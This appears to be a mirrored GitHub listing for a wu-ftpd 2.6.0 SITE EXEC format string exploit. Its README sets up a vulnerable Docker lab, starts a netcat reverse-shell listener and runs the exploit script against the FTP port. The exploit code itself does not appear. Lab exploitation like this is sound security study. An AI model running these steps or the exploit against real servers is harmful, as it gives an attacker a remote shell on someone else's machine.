https://github.com/optixal/wuftpd-format-string
Format string exploit + return-to-libc attempt targeting wuftpd 2.6.0 on Ubuntu 12.04.5 LTS x86
https://github.com/optixal/wuftpd-format-string
Last synced: 10 months ago
JSON representation
Format string exploit + return-to-libc attempt targeting wuftpd 2.6.0 on Ubuntu 12.04.5 LTS x86
- Host: GitHub
- URL: https://github.com/optixal/wuftpd-format-string
- Owner: Optixal
- License: mit
- Created: 2022-03-18T19:18:14.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2022-05-22T11:06:58.000Z (about 4 years ago)
- Last Synced: 2025-07-19T10:55:31.019Z (11 months ago)
- Language: Python
- Size: 18.6 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# wu-ftpd 2.6.0 SITE EXEC Format String Exploit
```sh
# wu-ftpd 2.6.0, in one terminal
docker run --privileged -it --rm -p 21:21 smuxcs/wu-ftpd-32-shellcode-canary-aslr:2.6.0
# Ubuntu or any other OS, in another terminal
docker run -it --rm ubuntu:latest # for getting a reverse shell, ensure this container has an IP of 172.17.0.5 or change the shellcode in exploit_automated.py
apt-get install netcat
nc -lvnp 7777 # listen on TCP 7777, if you want to change, change the shellcode in exploit_automated.py
# On host machine, in another terminal
./exploit_automated.py localhost 21
```